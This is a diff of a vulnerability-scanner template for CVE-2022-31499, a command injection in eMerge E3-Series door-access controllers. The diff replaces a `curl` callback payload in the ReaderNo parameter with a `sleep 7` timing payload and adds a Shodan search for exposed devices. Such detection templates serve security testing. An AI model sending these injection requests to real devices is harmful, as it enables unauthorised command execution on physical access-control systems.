template updated

cves/2022/CVE-2022-31499.yaml

@@ -1,26 +1,34 @@
 id: CVE-2022-31499
 
 info:
-  name: eMerge E3-Series Command Injection
+  name: eMerge E3-Series - Command Injection
   author: pikpikcu
   severity: critical
-  description: Nortek Linear eMerge E3-Series version 0.32-09c suffers from a blind OS command injection vulnerability.
+  description: |
+    Nortek Linear eMerge E3-Series devices before 0.32-08f allow an unauthenticated attacker to inject OS commands via ReaderNo. NOTE: this issue exists because of an incomplete fix for CVE-2019-7256 .
   reference:
     - https://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html
     - https://github.com/omarhashem123/CVE-2022-31499
     - https://nvd.nist.gov/vuln/detail/CVE-2022-31499
+  classification:
+    cve-id: CVE-2022-31499
+  metadata:
+    verified: true
+    shodan-query: title:"eMerge"
   tags: cve,cve2022,emerge,rce
 
 requests:
   - raw:
       - |
-        GET /card_scan.php?No=1337&ReaderNo=`curl%20{{interactsh-url}}`&CardFormatNo=1337 HTTP/1.1
+        @timeout: 15s
+        GET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1
         Host: {{Hostname}}
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: interactsh_protocol # Confirms the HTTP Interaction
-        words:
-          - "http"
-          - "dns"
+      - type: dsl
+        dsl:
+          - duration>=7
+          - contains(all_headers, "text/html")
+          - status_code == 200
+          - contains(body, '{\"CardNo\":false')
+        condition: and